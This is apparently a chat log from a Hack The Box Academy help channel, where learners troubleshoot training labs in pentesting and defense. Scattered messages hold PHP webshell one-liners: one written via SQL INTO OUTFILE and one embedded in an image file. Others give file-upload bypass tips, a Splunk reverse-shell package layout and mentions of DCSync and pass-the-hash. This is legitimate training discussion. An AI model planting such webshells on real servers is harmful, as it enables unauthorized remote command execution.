#modules
Thank you so much! That is changing how I understand the material as I read it. That's an unlock for me.
Most modern tools use -p to denote the port; with netcat, -p is used to denote the port binding on your system, i.e. connecting to a target from your machine's specific port
Shout-out to @pine dagger, without him I can't finish the Whitebox 101 module
sudo nc -p 53 ip port will bind port 53 as your connection port to the target port
🤯
Whereas ssh user@ip -p port means you're using ssh to connect to a target on that port (without -p, the port is implied default)
ahh - originally when I tried to answer the question I was thinking I needed to use this function - but first had to somehow find out how to gain the User info.
Nope, since netcat was discussed in this section, that's what they're expecting you to use
Anyone completed the Advanced XSS and CSRF module?
Hi community,
I'm having trouble with the "WINDOWS EVENT LOGS & FINDING EVIL: Tapping Into ETW" module lab.
SilkETW can't collect PID Parent Spoofing activity. I already executed it three times, no activity logged in etw.json file. The Process ID of spoolsv.exe is not searchable.
Did anybody experience this? Thanks.
I had the same issue, it seems like the format changed from the time the original module was created. I basically ran a PowerShell command to search the etw.json for the string 'Seatbelt' and saved it to an output text file. In the lecture, the answer is next to "ManagedInteropMethodName", so I searched for that string in the output text file.
Thank you! I found the answer. I did not know about the format update. I got stuck here for weeks. 😅
Guys, do we have to follow the order to access the next box in the season 4 challenge?
I did a different approach. I used the search PRINT command in chainsaw and got the same output. As far as I know, it's already in UTC 2019-03-17T19:30:30.324836Z and I'm stuck right now 😅
The question did not mention to convert the time in UTC either. How did you get the correct time?
I assumed the creator made the box in the US and corrected for that.
Took me a few tries though
I had to adjust by -8 hours.
Hi Hi, any moderator or administrator around? I can't seem to identify my htb account
I didn't expect to be saying this, but please be mindful when someone reaches out to you in DMs asking to verify the approach of solving an exercise, e.g., compare notes, etc. Consider if he wants to understand the exercise or get your notes to get the flag at the end. Thank you. Remember, you've put effort into understanding the topics and the exercises.
It's a main reason I decline unless it's just a switch of the frame of mind and spoilers get involved.
I don't mind sanity checks, but at least show me what you have tried so far and your way of working towards a solution.
Whenever I ask for sanity checks the first message should be: what have I tried, what domains/subdomains have I found, what ports have I found, etc.
So I can get a clear view of whether I am missing something early on
This way I don't ask for payloads, but more for a missing piece of information, and I actually get a sanity check for missing information or if I just can't get the exploit chain working
"Did you look at the thing?" Or "well... what can you do with x"
I.e. not all hashes need to be cracked
pth?
Yep
It's easy to think though "well I got a hash, can I crack it?"
When, with windows, the NT hash is as good as a password
I'll admit that before I started the AD module, I was one of them
Well because you just spent a module all about cracking hashes and passwords
And some pth
Mostly all I've done before the CPTS module is Linux machines, and it's usually crack the hash
windows has opened my eyes lol
Hi! I came here to search for help about the Monitored room, is it the right place to ask for help?
Thanks but I don't have access to this channel
This channel is for academy modules, you can access more of the server by following #welcome
Aka generally the first place to look when joining any server
Okay no problem, thanks
Module: **WINDOWS PRIVILEGE ESCALATION** - Miscellaneous Techniques
I don't understand the module - Cannot change the Always Install Elevated
settings - when I try to access Local Group Policy I get access denied. How am I supposed to change the settings then? It is the first step..
Thanks!
it's about how that setting can be used to elevate privilege if it's enabled, if you're testing it against the target machine you don't have admin rights to enable it
I’ve just started the senior web penetration tester path. What is the preferred method of providing feedback on any modules (either for tips to improve content or to report errors?)
In the "Attacking Common Services - Skill Assessment easy",|| I found the flag using "select LOAD_FILE ...", but wasn't able to get a webshell.
For the webshell I tried something like "SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/xampp/webshell.php'" for a PoC, like mentioned in the module. The command executed with no errors, but the directory stays empty and when going to the path, I get "not found". Anyone an idea why?||
#858470491676737536 is for suggesting fixes/alterations to modules
Using full paths helps, also if you wanna see where it goes, repeat the command and it'll tell you the file path already exists
Write manually
Bro, now I have the same problem, I need your help. Can I DM you?
Rewriting things in your own words is proven to improve retention
Hi, I have a problem in the Out-of-Band DNS
section, I find the flag but not the full flag, it's weird
Should I guess the path, or is there a way to find out? I mean I kinda guessed where the flag was as well.
Knowing where webroots are helps
It's something you can google
hello
nvm solved
I'm struggling to understand the reasoning behind and the concept of unmanaged PowerShell injection after reading the module several times over.
Is the point of this technique so that attackers can avoid detection by injecting powershell.exe into unmanaged processes so that arbitrary code execution can take place (through PowerShell) under the guise of legitimate processes?
Yes
Hey, does the basic_bruteforce.py work on question 2 in Broken Authentication: Weak Bruteforce Protections?
Hello
I've a problem in the Footprinting medium lab...
I try to get the important file but I have an error and can't figure it out 😦
Well i don't know why xD
Just ask your question
btw :
I've a problem in the Footprinting medium lab...
I try to get the important file but I have an error and can't figure it out 😦
smb: > get important.txt
Error opening local file important.txt
(I'm logged on the SMB server)
What folder are you in on your host?
I'm in devshare
A custom folder on desktop (/home/kali/Desktop/HTB/test/)
Weird
Strange
You can access that file via rdp anyway
I'm using: smbclient -U alex //<IP>/devshare
Functionally the same
Should be the same
yeah 😦
With RDP you can view the file ¯_(ツ)_/¯
Okay I'll try that
Gg embed
Give me your computer
I think you just need to modify it a little bit
😄
Yeah sure, I modified it, I added the X-Forwarded header but it does not work? I use the .csv wordlist provided in the script
i also tried to modify and change the value of this header after in every request, but it didn't work
you don’t bruteforce the second question
send a request with an authorized x-forwarded header
😉
Ok thanks for your answer.. but still - I try to get the reverse shell to work, but it doesn't, and I have a feeling that it's because I don't have that enabled..
This is written at the end of the section: This issue can be mitigated by disabling the two Local Group Policy settings mentioned above.
lol, thanks it worked, the description of this question is not very clear
if it's not enabled then privesc using that wouldn't work, try another way to get the flag
Good to know I'm on the right track at least.
So I'm under the belief that PowerShell (cmdlets...?) are in C#... therefore, that's why we look to see if clr.dll and clrjit.dll are running, because the presence of them running together under an unmanaged process is a telltale sign that the Common Language Runtime, the runtime environment needed to process the PowerShell (C#) code, is present, which then indicates potential injection...?
I'm not sure lol, I don't look deep into it. I'm just going off of base knowledge ¯_(ツ)_/¯
That's something you can Google to find out
are there recommendations for things to do after completing htb getting started?
INFORMATION SECURITY path
is it recommended to subscribe to vip? or no
you mean the main platform ?
for htb yes
not really
Vip has no bearing on academy
oh the getting started path for tier0-2 has half of them locked
behind vip
Oh. Starting-point
Which is on the main labs site not academy, read #welcome to see how to access more of the server
identify doesn't work for some reason
You need an account on https://app.hackthebox.com
I have one
then ig you gotta message a mod/admin to get it sorted ¯_(ツ)_/¯
Usually what messes with it is your dms being closed
Which you can temporarily switch to allow from the same server
<@&861185840277487616>
yep that one
✨ Fuck off ✨
Lol they left
some things never change
smh
I think longest I've seen shit like that was ~10 minutes
it's so common in cybersecurity servers
Anyway, here are some mods that might be able to help you link your account
hey hackers
oh no
someone help me please #1197141712435433583
No
noob hackers 
It looks like a connection was made so I see no issues
If you jump straight to insults, you're less likely to get help
Also this channel is for assistance with academy modules
Not some random shit you're doing
In the Payloads and Shells module, PHP shells section, last question: whatever PHP shell I upload just renders as text, not sure what's preventing it from working properly
I've tried with p0wnyshell and with wwwolf's PHP web shell listed in the text
I was able to use wwwolf
I remember that module. I used wwwolf too. It should work
I've definitely uploaded it to the right spot and it's just rendering as text
Should be able to follow the section to a T
Are you intercepting with burp?
yeah I've done everything right as far as I'm aware, maybe I'll reset the lab
Change content-type?
yeah I've tried with a couple of image file types as well
the shell is being uploaded, it's just not executing, it's printing the code to the page
Should work with image/gif
I dont recall having issues tbh
finally got it working with a much smaller cmd shell from revshells. weird
it's likely you may have needed to slightly change something in the php ¯_(ツ)_/¯
are you using a UDP connection by any chance and some packets got dropped?
nah i'm using TCP ¯_(ツ)_/¯
lol I figured it out, wget was adding a bunch of stuff to the start of the php files when I grabbed em from github, whoops
just git clone it
wget raw files only
Also that
lesson learned boiz
All this sums up to: user error
hi
check the files you download
Module: OSINT: CORPORATE RECON
Section: Cloud Storage
I'm kind of stuck on finding the bucket's name. I've tried searchcode, grayhatwarfare & some dorking but can't come up with anything when searching for several files.
Any tips?
I haven't done it cuz expensive.
But If it's related to a website, could you find the bucket name in the request?
Just ignore me, hopefully someone else can help
If it only was that easy 😄
What kind of info do you have to start with?
The question is: "Investigate the website and find the bucket name of AWS that the company used and submit it as the answer. (Format: sub.domain.tld)" from inlanefreight.com
And that's it really 😛 Some course content about searchcode, grayhatwarfare and google dorking
From the course content I think I'm supposed to search for the files somewhere
That's interesting. I'd check the network and look at the Post/get request as well as any API calls
yea done all that but it's not obvious 😛
or I'm looking over something but I've been at it for 2 days now >.<
It's been a while... I just remember a ctf challenge where I had to mess with buckets.
We could see that it was reaching for it to fetch the images so we got the address. Then I think there were some websites that did stuff.
Or maybe I directly tried to connect to it with aws' management cli... But I didn't take good notes so I don't remember.
Well... Maybe someone can help better. Does it have something with the ffuf module?
Are there any ongoing issues right now? Having a hard time trying to SSH to machines
no, not the ffuf module.
Like subdomain enumeration
Nah it's OSINT and enumeration is not OSINT 😛
hmm maybe it's just Linux priv esc then
I'm probably missing something obvious so someone who did it could push me into the right direction 😛
That's true.
Maybe some link on the webpage redirects to the subdomain.
If it's the same standard Inlanefreight website that exists in the other modules... I could probably try to wrack my head with you.
All I have is will, the expertise still isn't there hehe
good insights actually! Lemme look around!
Manually review JavaScript files as well
Can someone explain how snmpwalk dumps all those strings? Is it just reading OIDs or am I missing something?
I found it
it collects output for each sub-OID encountered during the walk and displays it to you
I think
I'm doing the labs for the Pivoting module and I'm unable to connect to the remote Ubuntu server
At least, it's extremely slow
How did you find it? 😛 Was the subdomain the right direction?
nope it's one of the main pages, just curl and grep
Mind if I DM you for a sec?
go ahead
Heyy, anyone have an idea how to bypass this problem? Even running PowerShell as administrator I can't see the hash from the SAM hive on Windows 11
Did you manage to solve this? I am having the same issue, whereby I sanitized length and type and replaced with console.log
what are you trying to run?
I'm trying to read the password hashes in a user's SAM table, should I read the nstd file directly? I'm trying to understand why even as an administrator I can't read the hashes.
cmd
```powershell
$registryPath = "HKLM:\SAM\SAM"
try {
    # Open the SAM hive key and list its values; on a live system the key is
    # locked, so this throws and lands in the catch block even as Administrator
    $registryItem = Get-Item -LiteralPath $registryPath
    $registryProperties = Get-ItemProperty -LiteralPath $registryPath
    $registryProperties
} catch {
    # $(...) is needed so the whole expression expands, not just $_
    Write-Host "Error: $($_.Exception.Message)"
}
```
the hives are locked on a live system, reg save first
is it possible to deactivate the protection to obtain the hash cache?
Hi guys, does anyone have a bad connection with the Pwnbox? It's really slow and laggy for me when I connect
I think you need to change server
I tried to change the server, still very slow
Pwnbox has a bunch of different servers, some may be closer and less laggy. AFAIK the Pwnbox server list shows latency
I picked the one with the lowest latency, UK then DE
Could be your network
Maybe it's time to switch to premium
afaik no, it's being used by the system itself, it's not just protection as much as it's needed for windows to function.
Premium? Lol neither labs nor academy has "Premium" as a subscription option
I mean VIP
Ah this channel is regarding htb academy and modules
Not the main site
Read #welcome
Also fwiw just set up your own vm
Ah, I think I got confused, sorry
I understand it would be necessary to copy the official hive into a new file?
yes, reg save or vss
I'm studying reg save, it's cool, thanks 🫡
What module is this for btw? (Also I think password attacks or something goes over attacking SAM)
No, it's not a module, it was a question by chance because I was trying to access a registry key but it was impossible for me to open it, but thanks
This channel is for academy modules, remember, so for any other practice you should be looking at other channels to post
Like #1024429874246590575 or #homelab-sysadm
Anyone help me with the Windows privilege escalation? I'm having trouble with my PowerShell
meh, I think asking related questions is fine
Ah yes, I'm sorry, as I'm used to this channel I forgot who else had one
Trying to modify the Druva PowerShell script to download a file to give me remote access but keep getting errors with the script
It's just missing context imo
Please who has completed the penetration testing path and is ready to share 🥺my license expired
?
License?
My subscription to the path
Don't call me dear
Sorry
Second you don't subscribe to a path, do you mean like silver annual? Or the student one?
Silver annual
On HTB enterprise
Module: CROSS-SITE SCRIPTING (XSS)
Section: PHISHING
Problem:
After injecting the XSS payload and checking that the page is displayed as intended, I verify the login form with a netcat listener, but the LISTENER DOESN'T RECEIVE ANYTHING.
I browsed through Discord for a similar problem, but it still doesn't work (port change, double quotes). What am I missing? The page displays as intended, maybe something is still missing in the XSS payload?
Enterprise is set up differently than regular, you're gonna have better luck contacting support
Fuck off
<@&861185840277487616>
Ok, how do I contact HTB? I did not receive 500 cubes this month, I received only 300
Need to speak to a person? Learn how to reach our support via HTB Labs.
Have you upgraded the subscription?
yes i have upgraded the subscription
This is why you got the difference. You probably upgraded it in your current billing cycle. You will receive the full amount in the next billing cycle.
but i have paid my amount for 500 cubes
I bet you paid the difference 🙂 Let's find out if you submit a ticket
Hola
English server friend
Yea its true sorry 😁
I cannot raise a ticket from the academy
If you can't see the support bubble, disable adblock
i disabled it
Pop-up blockers can also mess with it
let me login through Edge
Be patient dude
They're likely answering other requests too
Unfortunately yes
Yes, I put my IP as http and nc listening on 80. The payload works and the page is reflected clean, but still netcat doesn't intercept anything when I try to login
Careful just sharing the answers/methods
I recommend if you're gonna continue to take to dm (and delete these)
You mean me? I should delete?
Yes
Ok
Not the appropriate place to ask for issues with a VM or linux host
ok my bad
"Guys" is gender neutral, meaning multiple people
Let's knock it off with the thinly veiled transphobic comments
For Attacking Enterprise Networks: Exploitation & Privilege Escalation, I set up proxy chains and dynamic port forwarding, but the DNN keeps quitting on me. I can access the login page after waiting for a long time, and once it let me get past the login page but would not load the SQL console. In the ssh session I get messages "channel __: open failed: connect failed: temporary failure in name resolution"
As I get these messages, the page will still load but just slowly, it's just eventually I end up with a "connection has timed out" error
I have used this command: smtp-user-enum adding -w 20 and it has worked, after a few hours…
As an update to this. I just finished this module and the tool listed here shows the domain needed to answer the course flag. 🙃
noice, glad my old message still helps
The sacred texts
Ya it was strange sublist3r wasn't consistent on listing the domain name. Had to run it 3 times before it would show up. The tool you mentioned works all the time. Along with the previous scans.
Look into pivoting with tools such as ligolo-ng, but a standard SSH dynamic port forward will work just fine for this part; just use FoxyProxy + Firefox instead of something like proxychains + Firefox
Just want to share what happened for the CROSS-SITE SCRIPTING (XSS) module and the PHISHING session in case someone else has problems receiving the request in the NETCAT LISTENER.
The payload was right, but I copied it from a code block in Obsidian. I identified this code block as JavaScript.
What happened is that when I grab the copy from there and paste it on site, it misinterprets the IP... Just as happened here, when I copied the command (now deleted because that was against the rules). When I copied the command here the IP final part changed, I didn't know why, but it was modified, like encoded.
As soon as I removed the code block type from the Obsidian note where the payload was copied... The netcat listener worked and received the request.
Man, for many this was easy but for a person without code block experience, this troubleshooting was a blast.
obsidian doesn't encode anything, you probably copied the url from your browser which was encoded
Guys I made my homework to narrow down the problem. If I copy the command from the Obsidian JavaScript code block here on Discord, the IP will result as changed... Only the IP. If you let me do it you will see
I think there is some sort of meta data embedded when you copy a command from an Obsidian code block that you identify as that language. Because when I copy it from a code block WITHOUT ANY IDENTIFICATION it worked
so discord is encoding the url then. I can tell you for a fact that obsidian doesn't change anything in codeblocks, if it does I will be using another app for notes
currently doing PasswordAttacks / SAM
I did the manual way, now tried with crackmapexec, crazy how fast it is using this tool instead of manual 😄
Hello team, user & root flags don't submit on the Surveillance machine: "Incorrect flag"
Not the place, contact support
Need to speak to a person? Learn how to reach our support via HTB Labs.
my bad
@floral condor multi-line blocks are seen by discord as spam, you need to link your htb labs account to the discord to post them
I think this is the occasion to test by yourself. You should try the part of the Phishing session where you make sure that nc listened for the credentials.
Put the working payload in a code block in Obsidian, but specify inside the code block (on top) the kind of programming language used. Then put the payload in another neutral code block, without specification. Maybe I'm wrong
Here I copied it raw, without block
There's no Metadata type translation going on
I haven't tried with foxyproxy yet, I will give that a go. Thank you
the bots that manage and monitor the discord look at your messages differently depending on whether or not you are verified
Thanks
I have done that exercise and I know how obsidian works. the codeblock tag is just to tell obsidian what syntax to highlight it in, it doesn't change the behaviour of copying
It's like copying colored output from terminal and being sad it doesn't paste colored as its just copying the underlying text
As the highlight is done on a separate layer/interpretation
Get-ChildItem -Path "C:\Users\Administrator\Desktop\Blah" -Filter *.json | ForEach-Object { Get-Content $_.FullName | Select-String -Pattern "goofygoober" } | ForEach-Object { $_.Line + "`n" }
Like so
I guess you're right guys. I understand the purpose of a code block, however I still don't understand why one worked and one did not; by the way, I got unstuck and that is the best part
Skill issue. Maybe a slight difference
It's OK blue teamer
@oblique dove this is the better place to ask module questions btw
I am stuck at "Practical Digital Forensics Scenario", I don't understand how on the basis of the USN Journal I can find the process that created advanced_ip_scanner.exe
Timeline explorer 😄
there is literally no other exe
These entries aren't sorted by time
the screenshot has all the entries
It does not
You're filtering based on the entry number
I still don't get it. If I scroll manually through the whole list I see it was extracted from a .zip file. Idk what to search for
I have literally 0 clue
Well you already performed the needed steps to see that the .exe came from a .zip
just do the same to see where the .zip came from
I found the .csv file
Unsure of what you're referring to
But I also can't say much without spoiling the answer
you know that b come from a, now find a
Hey man I am having the same problem and would love a hint if you figured it out 🙂
You can DM
can this task just be done on the basis of USN Journal?
Hi, would anyone be able to help me with Active Directory module skills assessment 1, last question, read the flag on the DC01 desktop. I have creds for the machine but can't get access to read the flag, but I can DCSync and dump all hashes for users on the DC. I've also tried cme smb -x to read the file but nothing works
if you DCSync why not just log in as the Administrator
No service open to login
Yes there is
I am working through the CSP part right now and modifying my payload. I am able to use the iframe tag but can't find much use with it. Any reading or section of the module you can suggest to help put me in the right direction?
Whereabouts?
You can DM me.
will do
review your basic access methods for windows
Done, I was being stupid, thanks anyway
Hi, I'm just getting started on the website - does completing sections in a module generally award additional cubes beyond the module reward? Or is it impossible to get a large amount of cubes without a subscription? I'm fine either way, just wanna know what I'm getting into
Each module shows you in advance how many cubes it costs and how many cubes you will get back.
so you'd never get more cubes than you started with? fair enough
Nope
Depends if you have the annual subscription
Then you earn cubes by finishing modules and don’t need to buy them individually
mhm thanks
FoxyProxy still doesn't work. I have SSH dynamic port forwarding running, I set the proxies in Firefox to manual: 127.0.0.1:8081 and my FoxyProxy to the same. I've tried with both SOCKS4 and SOCKS5. I've also tried with a proxychains.conf file containing the same or without it. Is this just one of those "restart it until it works" times? Or is my configuration wrong? I've tried restarting a couple times
Hello, I get this error after adding a group to the sudoers file, what to do? Warning: /etc/sudoers:25:24: Cmnd_Alias "NOPASSWD" referenced but not defined
Hello everyone, I am doing the final exercise of this chapter: FILE UPLOAD ATTACKS. I managed to take all the information necessary to create a payload to create a reverse shell, but I think I have a problem in my payload, could you help me?
����^@^PJFIF^@^A^A^A^A,^A,^@^@��^@dExif^@^@II*^@^H^@^@^@^B^@^N^A^B^@-^@^@^@&^@^>
<?php system($_REQUEST['cmd']);?>
wrong file type
take a look at Wikipedia's list of file types
Hey guys, I have a Q on splunkd
created a tarball:
||splunk_shell/
splunk_shell/bin/
splunk_shell/bin/rev.py
splunk_shell/bin/run.bat
splunk_shell/bin/run.ps1
splunk_shell/default/
splunk_shell/default/inputs.conf||
in the ||rev.py|| I updated the IP & port, but I don't get a response from the Linux host, is there something I missed from the module?
https://academy.hackthebox.com/module/113/section/1213
Module: Attacking Authentication Mechanisms
Section: Weak Public/Private Keys
https://academy.hackthebox.com/module/170/section/1674
The start of the section stipulates navigating to http://sp1.htb.net and logging in with credentials shared in the SAML section. However when I click on the "Login (Weak Public/Private Key)" hyperlink, I'm redirected to a "Metadata Not Found" page on idp1.htb.net (and never given an opportunity to enter any credentials (see screenshot below). I think I've made an administrative error of some kind in setting up the lab, but I'm not sure.
EDIT: resetting the lab twice got it working.
I don't get a connection after updating the .spl file
Can anyone help with the public exploits section in the Getting Started module? I can go over all I've done in DMs and what exact step I'm stuck on, thanks!
You can explain what you've done here
If it's nmap: getting you nowhere
can anyone please help me with Advanced Deserialization Attacks - Example 1: JSON.. I have a payload but unable to get a shell
proxychains!!!
Hi there, is any HTB Moderator in the audience? I'm trying to connect through RDP to the SeImpersonate and SeAssignPrimaryToken section lab, but I can't connect and am getting a certificate error message
I rebooted the lab machine twice and same issue....
vv
Hey, I'm new to Hack The Box and I'm having trouble with my first lab: Documentation & Reporting. I'm completely stuck on the first question: Connect to the testing VM using Xfreerdp and practice testing, documentation, and reporting against the target lab. Once the target spawns, browse to the WriteHat instance on port 443 and authenticate with the provided admin credentials. Play around with the tool and practice adding findings to the database to get a feel for the reporting tools available to us. Remember that all data will be lost once the target resets, so save any practice findings locally! Next, complete the in-progress penetration test. Once you achieve Domain Admin level access, submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host.
I don't want the answer, I just want to learn the steps to find it. I literally just learned you have to connect to the hub, like super noobie ;-;
I haven't done this particular module yet, but did you connect to the target VM using xfreerdp already?
I was doing other work, but I was able to use nmap scans and got the service running on port 22 and did a search for some exploits for that service, which was OpenSSH 8.4p1 Debian 5+deb11u1. All I could find was a sid exploit which is exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection; there were a couple but this is the one I picked under sid, I forgot why, it's been some hours since I was last on. When I use the show options cmd I'm not sure what options I need to set. I know it says that any option that has yes needs to be set, but I followed along with the section and just changed the RHOSTS and LHOST to what was shown and used check but got back an error. Am I using the wrong exploit search or am I supposed to find an IP to connect RHOSTS to and then keep LHOSTS tun0? DM me with any helpful information, thanks!
I searched that up but didn't know what to fill in for server and port since it gave me an error
[options] server[:port] [[options] server[:port] ...] I used this which I found on die.net
I'm like super new to everything since it isn't my major but I'm taking it as an elective
Ah okay, I believe server should be the IP which was generated when you spawned the machine. Please refer to this article, it walks you through connecting to a VM via xfreerdp:
https://medium.com/@laupeiip/how-to-rdp-into-a-tryhackme-windows-machine-with-your-kali-vm-f637cf7422d1
FYI, you can follow the same steps from the Pwnbox instance that uses Parrot
Wasn't sure which channel to publish this question in but since it's nmap related, I figured this was appropriate.
While performing an Nmap scan against a host, Paola determines the existence of a firewall.
In an attempt to determine whether the firewall is stateful or stateless, which of the following options would be best to use?
A. -sA
B. -sX
C. -sT
D. -sF
I think it's -sT since it attempts to establish a full connection, which will help with determining whether the firewall is stateful or stateless. But I'd love to hear your answers.
Thank you so much, I just needed help starting it
Is anyone around to help with footprinting medium lab
Have you found the solution for this? If not, here is the way.
But was this asked as part of a lab exercise? 🤔 Afaik, it was just mentioned for your own research
That module is one of the last modules in the CPTS path and expects you to know a lot already, it’s probably not a good first module if you are new
it was literally the first module for my class :'D the next one is footprinting
your class? you're doing HTBA in school?
Do you know the „draw the rest of the owl“ meme? That’s what this module is for beginners. It teaches you the theoretical aspects of documenting and that it is important (which is good to know as a beginner) but it ends with a „finish the pentest“ question for which you just aren’t equipped. So at least the final assessment is way out of scope for a first module but oh well
CIS4200.001S24.16561 Penetration Testing :,D
save me ;-;
Well to finish the module you just have to write „Done“ I think, but if you actually wanna do the pentest Eeeeh
Oh nvm you do need the flag huh
while it's great that you are doing that in school, documentation and reporting should absolutely not be the place to start if you're new, that module requires knowledge of all the previous modules, and is the second last module in the course. what is your instructor smoking?
he made it due on saturday but every section is like 100+ words and word vomit
i dont think imma enjoy the course
i have no idea man its like a cs requirement
im an IT and this is my first hacking course
There are only a few modules that have this much text without Praxis questions, most of the other modules are way more hands on
thank u for the hope
that's because you got thrown in the deepend without knowing the basics
I have no words other than your school should do better
(they hate IT/Cybersecurity major)
they only give attention to med students or like compsci
Is it possible for you to contact the instructor and ask about having to do the final question? Tell them you read the contents of the module and maybe practice a bit with the reporting tool and then tell them you don’t feel equipped to do the pentest yet with what you have learned so far
hi~
Brothers, is there any correlation? LD_PRELOADThe shooting range of environmental rights.
🥲
im thinking of attending office hours and being like mn i dont get eny of this imma need extra help or extensions
I don't think it's you that's the problem. I bet your instructor just looked at the names and general content of the module and figured it is a good theory module to get started without realizing that the module belongs to a path and is at the very end of it. Someone just needs to make them aware that the module ends with a pretty hard question that you just aren't prepared for
Yeah everything was going so well I’m just stuck on the lab question
Like I went back and tried to figure out how to do the lab but the beginning talks about documenting ur findings
And like scenarios of losing your work and having like a backup ? It’s completely different from the lab imo
yup. It is module number 27 of 28 of the CPTS path and it expects you to know the content of various other modules like the Active Directory Module or Password Attacks. What it wants you to do isn't hard, but if you don't have the knowledge from the other modules you will be lost pretty quickly
the Footprinting Lab you mentioned is module 4 of 28 of the CPTS path, that one you can do a lot easier without any previous knowledge
Hi guys! If anyone needs help on the Stack-Based Buffer Overflows modules(Linux and Windows) or Assembly modules feel free to dm
Okay I have to get something off my chest.
Hack the Box is INCREDIBLE! Truly, thank you guys!
The way the academy explains things, man if you concentrate and do the work, you WILL get better! Im by no means a beginner anymore but I always had issues with Sql Injections
and wow I finally fully get them, its an amazing feeling
rant over! 
@next bronze btw I didnt pass OSCP the other day. Fell 10 points short. it was super annoying cus I got the 3 single machines, didnt have bonus points and couldnt get into ws01 for the AD set of machines. Otherwise I believe I could've got a perfect score. Cus Academy has taught me AD quite well...
But we move. Trying again in march
ah that sucks, so close, don't give up! you will get there 💪
absolutely, no doubt!
Hi, can I DM you about this Injection Attacks skill assessment? I have tried HTML Injection in PDF Generators in the comment but it doesn't work. I would love to chat with you and bounce a few ideas off you for a nudge. Thanks
hi folks,
is there any third party service i can use to share my progress with an employer via a link, besides the Student Transcript?
Sure, you can DM.
can I dm you
hello, i joined the platform 3 days ago and i always have 0 / 1 spawns left, if i buy the 18 dollars a month subscription, will it sort the problem?
also, i normally pay with paypal on the internet, will it be safe to put in my card?
If you buy any amount of cubes you get unlimited: I will also say, setting up your own virtual machine will be better
i dont know what "setting up your own vm" means
Set up your own virtual machine
hello friends im currently stuck on the first question of the skills assessment of the intro to assembly, can anyone point me towards how one can go about completing it? im missing something, maybe send me to some other learning resource with relevant info cause im completely lost
yea im not sure what it means
Use your own virtual machine instead of the one on the website
the Vm is the window where i click start instance and then interact?
Yes, you can download and install one on your system instead of using that
Virtualbox and VMware are popular for windows systems
i thought this window is simulating the "target", if i want another window like that, i need to get into another user's PC, no?
There's a module called "Setting up" that walks through it
The target is separate from the pwnbox "start instance"
You can do it on the same pc
@next bronze Ive gotten prompt but it closes out on return tried sending it to provided box and it fails to load
ill get to it then, i finished the "intro to academy"
now im doing "learning process" "getting started" and "linux fundamentals"
what? the first question got nothing to do with the target
Then you didn't really pay attention. The "target" is always what's spawned with the "Click here to spawn target"; you don't have to "spawn instance" with your own vm
They are separate buttons with separate functions
i guess i missed that info. thanks man for being so helpful and responsive
Hlo
@next bronze this question is confusing the crap out of me, the shellcode ive extracted just pops a broken command prompt
Also a vm allows you to be in more control of things
@frosty spade Can I DM you
Are you dming to help them?
i dont know where "click here to spawn target" is, did i miss something
there's no need to run the shell code on the target, use the shellcode loader script. follow the steps I gave
It's right above the questions
Green text
@gray shoal as an example
can i dm you?
how to send screenshot here? prnt screen ctrl v doesnt work
The learning process module doesn't have target interactive sections
So you may not see it
yea i was just about to say that its not clickable
The intro module explains the different section types
If it's in the text section of the lesson, it won't be - you'll need to scroll down to the questions
It will be below the "spawn instance" window
The spawn target system button will ALWAYS be near the section questions
i had trouble because these are the instructions : Follow the steps below to complete this exercise.
Spawn your target!
Spawn My Workstation if you haven't done so.
From your workstation, open Firefox and browse to the target URL.
Answer the question below.
and mozilla firefox didnt appear for me, so i used chat gpt to give me a command to download it
i think i havent yet seen the spawn target system
If you're relying on chatGPT. Then you're not gonna learn
Also: is English your first language?
no
Then that's why there's gonna be struggles
i speak english well tho
You're not understanding the material. However.
@next bronze ive looped it, ended with a seg fault, extracted with gdb but the shell just gives me an empty prompt
The workstation, "spawn instance" does in-fact have Firefox on it
xor [rdx], rbx
add rdx, 8
loop
The spawn target button would be located below that window, right above the first question
how to send screenshots here?
You need to link your app.hackthebox.com account following #welcome
But it's likely you misunderstood what you need to do
Literally just scroll down to where the questions are
And click the green text there
but i answered the questions correctly
Not the text that's detailing instructions in that section
did you remove the 0x
Then we're misunderstanding each other
You understand how to spawn and interact with targets, but there's a disconnect
The pwnbox. "Spawn Instance" is NOT the target
ok go on
@next bronze from the script? or from the gdb codes?
if i open mozilla firefox and put the IP in the address bar there, is it spawning a target?
then what is it? and what would the target be?
No
your shellcode should not contain 0x
The target is whatever IP is given to you when you click the Spawn target button
When you used the browser: that's just interacting with the target
@next bronze id does not contain any x0
id?
The target is already spawned before you put the ip in your browser
should the spawn target button be clickable in the "introduction to academy" module?
Only above the questions directly. The in-text part is ONLY an example, you cannot click that
@next bronze my code starts with 4831c05048bbe67
that seems right, dm me
It depends
Some targets will need you to authenticate to them via rdp/ssh; if it's an ip:port, generally they are interacted with via browser at http://ip:port
However it's important to read the questions
Usually you will be told to 'ssh to ip with "username" and "password"'
The questions give more context to what you're specifically meant to do
okay
ill keep looking and learning
is it safe to put my credit card then? in the website?
Yes
thanks
i think the silver subscription will be enough for me
200 cubes every month and if i correctly understood we are being refunded for every module we finish no?
right?
Sort of
Only tier0 give all their cubes back
The rest give 20%
buying a monthly sub is cheaper in the long run ¯\_(ツ)_/¯
yea just bought the 18 dollars monthly subscription
how do i cancel my membership if i want to?
In the billing page, there's a button that says "cancel subscription"
you should be paid by htbox
It would be illegal for them not to have one
Anyone available to support me on the "Detecting Attacker Behavior With Splunk Based On Analytics"? I am quite sure that I have the correct query although I cant get the answer. Maybe something small 🤔
Hi, I've recently started HTB academy, I'm unable to start the machine (Spawn machine)
Hello everyone, I am doing the final exercise of this chapter: FILE UPLOAD ATTACKS. I managed to gather all the information necessary to create a payload for a reverse shell but I think I have a problem in my payload, could you help me? I am mainly looking for the procedure that I must carry out. I analyzed my files (upload.php and common-functions.php) so I am informed, I was told to do this but obviously it still does not work...
I did not take this module yet, but try the null byte, brute force the allowed executable extensions.
Try to submit a correct magic header bytes for the given image.
Filename.phar.jpeg
Sounds like there is a missing .php
@gray shoal next time ask for permission before dming
and 2 i don't know that person
where please? normally phar is okay
Ok then nvm
what is NVM ? I am French ^^"
nvm - nevermind
Module: Information Gathering - Web Edition
tasks: Active Subdomain Enumeration
hi guys i have a problem
I added the domain and IP address of the machine in the question to the host file, but I cannot analyze it with the nslookup tool.
i can ping inlanefreight htb
you need to use the target_ip to query it with
my /etc/hosts
machine_ip inlanefreight.htb
you still need to specify the ip with nslookup
otherwise it just attempts to use public dns servers, which will fail
okey understand but not working
nslookup inlanefreight.htb 10.129.97.97
Server: 10.129.97.97
Address: 10.129.97.97#53
*** Can't find inlanefreight.htb: No answer
10.129.97.97 (machine_ip)
